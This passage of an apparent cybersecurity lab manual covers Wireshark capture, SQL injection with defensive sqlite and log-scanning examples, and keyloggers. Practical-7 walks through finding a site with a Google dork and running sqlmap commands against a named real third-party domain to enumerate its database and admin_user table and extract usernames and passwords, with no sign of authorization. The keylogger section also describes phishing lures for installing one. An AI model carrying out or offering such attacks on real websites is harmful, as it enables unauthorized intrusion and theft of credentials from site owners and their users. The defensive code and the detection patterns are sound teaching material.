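    src_ip, dst_ip = bytes([192, 168, 1, 10]), bytes([142, 250, 74, 78])
    # TCP: sport, dport, seq, ack, data offset (5 words << 4), flags 0x18 = PSH|ACK, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", 51234, 443, 0x12345678, 0x9ABCDEF0, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    # IPv4: ver/IHL, TOS, total length, ID, flags/frag (DF set), TTL, proto 6 = TCP, csum, src, dst
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0xABCD, 0x4000, 64, 6, 0, src_ip, dst_ip)
    ip = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return eth + ip + tcp + payload   # TCP checksum left 0 in this sample


def parse_frame(frame: bytes) -> Dict[str, dict]:
    """Decode one frame into per-layer dictionaries (layer 2, 3, 4, then TLS)."""
    layers: Dict[str, dict] = {}
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    layers["ethernet"] = {"dst": dst.hex(":"), "src": src.hex(":"), "type": etype}
    if etype != 0x0800:
        return layers
    ihl = (frame[14] & 0x0F) * 4
    ip = frame[14:14 + ihl]
    _vi, _tos, total_len, _id, flags_frag, ttl, proto, _csum, s, d = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    layers["ipv4"] = {
        "src": ".".join(map(str, s)), "dst": ".".join(map(str, d)),
        "ttl": ttl, "protocol": proto, "total_length": total_len,
        "dont_fragment": bool(flags_frag & 0x4000),
        "checksum_ok": ip_checksum(ip) == 0,   # a valid header sums to zero
    }
    if proto != 6:
        return layers
    t = 14 + ihl
    sport, dport, seq, ack, off_res, flags, win, _tcsum, _urg = struct.unpack("!HHIIBBHHH", frame[t:t + 20])
    doff = (off_res >> 4) * 4
    names = ["FIN", "SYN", "RST", "PSH", "ACK", "URG"]
    layers["tcp"] = {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
                     "flags": [n for i, n in enumerate(names) if flags & (1 << i)], "window": win}
    payload = frame[t + doff:14 + total_len]      # stop at IP total length, ignore Ethernet padding
    layers["payload"] = {"length": len(payload), "bytes": payload}
    if 443 in (sport, dport) and len(payload) >= 5 and payload[0] in (20, 21, 22, 23):
        ctype, ver, rlen = struct.unpack("!BHH", payload[:5])   # TLS record header is plaintext
        layers["tls"] = {"content_type": ctype, "version": TLS_VERSIONS.get(ver, hex(ver)), "length": rlen}
    return layers


if __name__ == "__main__":
    record = b"\x17\x03\x03\x00\x05" + b"hello"   # application-data record, version field 0x0303
    for name, fields in parse_frame(build_frame(record)).items():
        print(name, fields)
```

Flipping any byte of the IPv4 header in a captured frame makes checksum_ok false, which is the same condition Wireshark reports as a bad IP checksum when header validation is enabled in its IPv4 preferences.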

How to Capture Packets Using Wireshark


Once you've installed Wireshark, you can start grabbing network traffic. But
remember: to capture any packets, you need to have proper permissions on your
computer to put Wireshark into promiscuous mode.

○ On a Windows system, this usually means you have administrator access.
○ On a Linux system, it usually means that you have root access (or membership of
the wireshark group, so that dumpcap can capture without the GUI running as root).

As long as you have the right permissions, you have several options to actually start
the capture. Perhaps the best is to select Capture >> Options from the main window.
This will bring up the Capture Interfaces window, as shown below in Figure.

For this example, we’ll select the Ethernet 3 interface, which is the most active
interface. Wireshark visualizes the traffic by showing a moving line, which represents
the packets on the network.
Once the network interface is selected, you simply click the Start button to begin your
capture. As the capture begins, it’s possible to view the packets that appear on the
screen, as shown in Figure below.

In Wireshark, just go to Statistics >> I/O Graph, and you'll see a graph similar to the
one shown in Figure.

This particular graph shows typical traffic generated by a home office. The spikes
in the graph are bursts of traffic caused by generating a DDoS attack from a few Linux
systems. In this case, three major traffic bursts were generated. Cybersecurity
professionals often use Wireshark as a quick and dirty way to identify traffic bursts
during attacks.
It's also possible to see the amount of traffic exchanged between one system and
another. If you go to Statistics and then select Conversations, you will see a
summary of conversations between endpoints, as shown below in Figure.

Practical-6
Examine SQL injection attack.

What is an SQL injection attack?

Structured Query Language (SQL) is a language designed to manipulate and manage data in
a database. Since its inception, SQL has found its way into many commercial and open
source databases. SQL injection (SQLi) is a type of attack that targets these databases
with specially crafted input that the application pastes into an SQL statement, tricking
the database into doing unexpected and undesired things.

Actions a successful attacker may take on a compromised target include:

● Bypassing authentication

● Exfiltrating/stealing data

● Modifying or corrupting data

● Deleting data

● Running arbitrary code

● Gaining root access to the system itself



Most database types (with the notable exception of Oracle) have a set of views called
the information schema which provide information about the database.

You can query information_schema.tables to list the tables in the database:

SELECT * FROM information_schema.tables

This returns output like the following:

TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  TABLE_TYPE
=====================================================
MyDatabase     dbo           Products    BASE TABLE
MyDatabase     dbo           Users       BASE TABLE
MyDatabase     dbo           Feedback    BASE TABLE

This output indicates that there are three tables, called Products, Users, and
Feedback.

You can then query information_schema.columns to list the columns in
individual tables:

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

This returns output like the following:

TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  COLUMN_NAME  DATA_TYPE
=================================================================
MyDatabase     dbo           Users       UserId       int
MyDatabase     dbo           Users       Username     varchar
MyDatabase     dbo           Users       Password     varchar

This output shows the columns in the specified table and the data type of each
column.

Equivalent to information schema on Oracle


On Oracle, you can obtain the same information with slightly different queries.

You can list tables by querying all_tables:

SELECT * FROM all_tables

And you can list columns by querying all_tab_columns:


SELECT * FROM all_tab_columns WHERE table_name = 'USERS'
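To make the injection mechanism described in this practical concrete, here is an added Python example (not code from the lab manual) built on the standard sqlite3 module. It puts the vulnerable string-concatenation pattern next to a parameterised query and an input-validated variant and runs the same inputs through each, so the difference between "the quote becomes SQL syntax" and "the quote is just data" is visible. The Products and Users tables are constructed to match the information_schema output above; list_tables and list_columns are SQLite's stand-ins for information_schema.tables and information_schema.columns, since SQLite has no information schema of its own.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with the Products and Users tables named above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Username TEXT, Password TEXT);
        INSERT INTO Products VALUES (200, 'Widget', 9.99), (201, 'Gadget', 19.99);
        INSERT INTO Users VALUES (1, 'admin', 'hashed-password-placeholder');
    """)
    return conn


def product_vulnerable(conn, product_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text."""
    query = "SELECT id, name, price FROM Products WHERE id = " + product_id
    return conn.execute(query).fetchall()


def product_safe(conn, product_id):
    """Hardened pattern: a bound parameter is sent as a value, never parsed as SQL."""
    return conn.execute(
        "SELECT id, name, price FROM Products WHERE id = ?", (product_id,)
    ).fetchall()


def product_validated(conn, product_id):
    """Hardened further: reject anything that is not a plain integer before querying."""
    if not product_id.isdigit():
        raise ValueError("product id must be a positive integer")
    return product_safe(conn, int(product_id))


def probe(func, conn, value):
    """Summarise how a handler reacts to an input: the exception name, 'rows' or 'empty'."""
    try:
        rows = func(conn, value)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__
    return "rows" if rows else "empty"


def list_tables(conn):
    """SQLite's counterpart to information_schema.tables."""
    rows = conn.execute("SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")
    return [name for (name,) in rows]


def list_columns(conn, table):
    """SQLite's counterpart to information_schema.columns: (name, declared type).

    PRAGMA statements cannot take bound parameters, so the table name is
    checked against the catalogue instead of being trusted.
    """
    if table not in list_tables(conn):
        raise ValueError(f"unknown table: {table!r}")
    return [(row[1], row[2]) for row in conn.execute(f"PRAGMA table_info({table})")]


if __name__ == "__main__":
    db = make_db()
    # The single-quote probe: id=200' breaks the concatenated query, but is only an
    # unmatched value for the parameterised one and is rejected outright by validation.
    quote_probe = "200'"
    for name, handler in [("vulnerable", product_vulnerable),
                          ("parameterised", product_safe),
                          ("validated", product_validated)]:
        print(f"{name:>13}: id=200  -> {probe(handler, db, '200')}")
        print(f"{name:>13}: id=200' -> {probe(handler, db, quote_probe)}")
    print("tables:", list_tables(db))
    print("Users columns:", list_columns(db, "Users"))
```

The OperationalError raised by the vulnerable handler is the "SQL error page" that the next practical uses as its vulnerability indicator; the two hardened handlers never let the database see malformed SQL, so there is no error to observe and nothing for crafted input to alter.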

Practical-7

Perform SQL injection with SQLMap on a vulnerable website found using Google dorks.

Introduction to SQL injection:-

SQL injection is a code injection technique, used to attack data-driven applications, in
which malicious SQL statements are inserted into an entry field for execution (e.g. to dump
the database contents to the attacker). SQL injection must exploit a security vulnerability in
an application's software, for example, when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input is not strongly
typed and unexpectedly executed. SQL injection is mostly known as an attack vector for
websites but can be used to attack any type of SQL database. In this guide, I will show you
how to use SQLMAP for SQL injection on Kali Linux to hack a website (more specifically its
database) and extract usernames and passwords.

SQLMAP:-

sqlmap is an open source penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws and taking over database servers. It comes with a
powerful detection engine, many niche features for the ultimate penetration tester and a
broad range of switches ranging from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing commands on the operating
system via out-of-band connections.

Step 1: Find a vulnerable website

We use a Google Dork string to find a website that is injectable with SQLMAP.

The Google Dork string we are going to use is "inurl:index.php?id="

One of the search results looks like this:

"http://www.tunesoman.com/product.php?id=200"

Now just add a single quotation mark ' at the end of the URL:

http://www.tunesoman.com/product.php?id=200'

If the page returns an SQL error, the page is vulnerable to SQL injection.

See the example of an SQL error in the screenshot below:-

Step 2: Open SQLMAP

Open SQLMAP in the terminal. If you want more information about SQLMAP, type
"sqlmap --help"; it lists all the options used while running SQLMAP. See the screenshot
below.

To determine the databases behind the web site, we need to run this command in the
terminal against

http://www.tunesoman.com/product.php?id=200

Notice that I have circled the two available databases, information_schema and
db363851433. information_schema is included in every MySQL installation and holds
information on all the objects in the MySQL instance, but not data of interest. Although
it can be beneficial to explore those databases to find objects in all the databases in the
instance, we will focus our attention on the database db363851433, which may have some
valuable information. Let's explore it further.

2.5 We can retrieve all the tables present in database db363851433 by using the
following command:

sqlmap -u http://www.tunesoman.com/product.php?id=200 -D db363851433 --tables

Now I want to gain more information about the admin_user table, so type the
following command:

sqlmap -u http://www.tunesoman.com/product.php?id=200 -D db363851433 -T admin_user --columns
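Seen from the server side, both the manual quote probe in Step 1 and an automated sqlmap run leave traces in the web server's access log. The following Python script is an added example, not part of the lab manual or of sqlmap: it parses constructed Apache combined-format lines (addresses, timestamps and the version string are made up; that sqlmap's default User-Agent begins with "sqlmap/" is my assumption) and flags requests whose parameters contain quotes or SQL fragments, requests from a scanner user agent, and 5xx responses, then counts hits per source address so an operator can see which client is probing.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format lines (hypothetical server and addresses).
# Line 2 is the manual single-quote probe answered with a 500; lines 3 and 4 carry
# a scanner User-Agent (assumed to start with "sqlmap/"; the version string is made up).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /product.php?id=200 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /product.php?id=200%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /product.php?id=200 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /product.php?id=200%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7 (https://sqlmap.org)"
192.0.2.4 - - [10/Oct/2023:13:57:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# SQL fragments that have no business inside an id parameter.
SQL_SYNTAX = re.compile(
    r"(?i)\b(?:union\s+select|information_schema|(?:and|or)\s+\d+\s*=\s*\d+|sleep\s*\()"
)


def parse_line(line):
    """Split one combined-format line into its fields, with decoded query parameters."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # parse_qsl percent-decodes, so %27 shows up as a literal quote here.
    entry["params"] = dict(parse_qsl(urlsplit(entry["target"]).query))
    return entry


def flag_request(entry):
    """Return the list of reasons a request looks like SQL injection probing."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        reasons.append("scanner_user_agent")
    values = " ".join(entry["params"].values())
    if "'" in values or '"' in values:
        reasons.append("quote_in_parameter")
    if SQL_SYNTAX.search(values):
        reasons.append("sql_syntax_in_parameter")
    # A 5xx right after a quoted parameter is the "page returns an SQL error" signal.
    if entry["status"] >= 500:
        reasons.append("server_error")
    return reasons


def scan_log(text):
    """Parse every line and keep only the requests that triggered at least one reason."""
    flagged = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = flag_request(entry)
        if reasons:
            flagged.append({"ip": entry["ip"], "target": entry["target"], "reasons": reasons})
    return flagged


def suspicious_sources(text):
    """Count flagged requests per client address, for blocking or follow-up."""
    return dict(Counter(item["ip"] for item in scan_log(text)))


if __name__ == "__main__":
    for item in scan_log(SAMPLE_LOG):
        print(item["ip"], item["target"], ", ".join(item["reasons"]))
    print(suspicious_sources(SAMPLE_LOG))
```

The user-agent check is the weakest of the four signals, since a scanner's agent string can be changed on the command line; the parameter-content and error-response checks hold regardless of what the client claims to be, and a burst of them from one address is what to alert on.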

Practical-8

Examine software keyloggers and hardware keyloggers.

What is a keylogger? At its most basic definition, a keylogger is a function which records the
keystrokes on a computer. Taken at this basic level, a keylogger looks absolutely harmless. In
the hands of a hacker or a cybercriminal, a keylogger is a potent tool to steal your
information. We'll talk about how a keylogger works, how cybercriminals install it on your
computer, and what you can do to avoid being a victim. You'll know what a keylogger is when
we're done.

WHY KEYLOGGERS ARE A THREAT

Keyloggers are a serious threat to users and the users' data, as they track the keystrokes to
intercept passwords and other sensitive information typed in through the keyboard. This gives
hackers access to PIN codes and account numbers, passwords to online shopping sites, email
ids, email logins, and other confidential information.

When the hackers get access to the users' private and sensitive information, they can take
advantage of the extracted data to perform online money transactions from the user's account.
Keyloggers can sometimes be used as a spying tool to compromise business and state-owned
companies' data.

The main objective of keyloggers is to interfere in the chain of events that happen between a key
being pressed and the data being displayed on the monitor as a result of that keystroke. Keylogging
can be done by introducing wiring or a hardware bug in the keyboard; by video surveillance; by
intercepting input and/or output; by implementing a filter driver in the keyboard stack; or by
requesting data from the user's keyboard using standard documented methods. There are two
other rootkit methods used by hackers: masking in kernel mode and masking in user mode.

HOW KEYLOGGERS SPREAD

● Keyloggers can be installed when a user clicks on a link or opens an attachment/file
from a phishing mail.

● Keyloggers can be installed through a webpage script. This is done by exploiting a
vulnerable browser; the keylogger is launched when the user visits the malicious
website.

● A keylogger can be installed when a user opens a file attached to an email.

● A keylogger can be installed via a web page script which exploits a browser
vulnerability. The program will automatically be launched when a user visits an
infected site.

● A keylogger can exploit an infected system and is sometimes capable of downloading
and installing other malware on the system.

HOW HACKERS INSTALL A KEYLOGGER

A hacker employs a Trojan virus as a delivery tool to install a keylogger. But way before one is
downloaded onto your system, a hacker will use one of two different methods to get it into your
computer. And both ways involve your participation.

The first method involves phishing. Phishing is the act of faking an email from a legitimate
company to fish for passwords and credit card numbers. Sometimes, these emails contain
attachments which download programs stealthily onto your computer once you click on them.

For the second method, the hacker researches the intended victim beforehand in order to find
a weakness in his or her online habits. Let's say a hacker finds out the victim habitually visits
porn sites; the hacker might craft an email with a fake coupon for a membership to an exclusive
erotic website. Since this method targets a particular fondness of the victim, there's a large
chance of success that he or she will download the fake attachment, unknowingly installing the
keylogger.
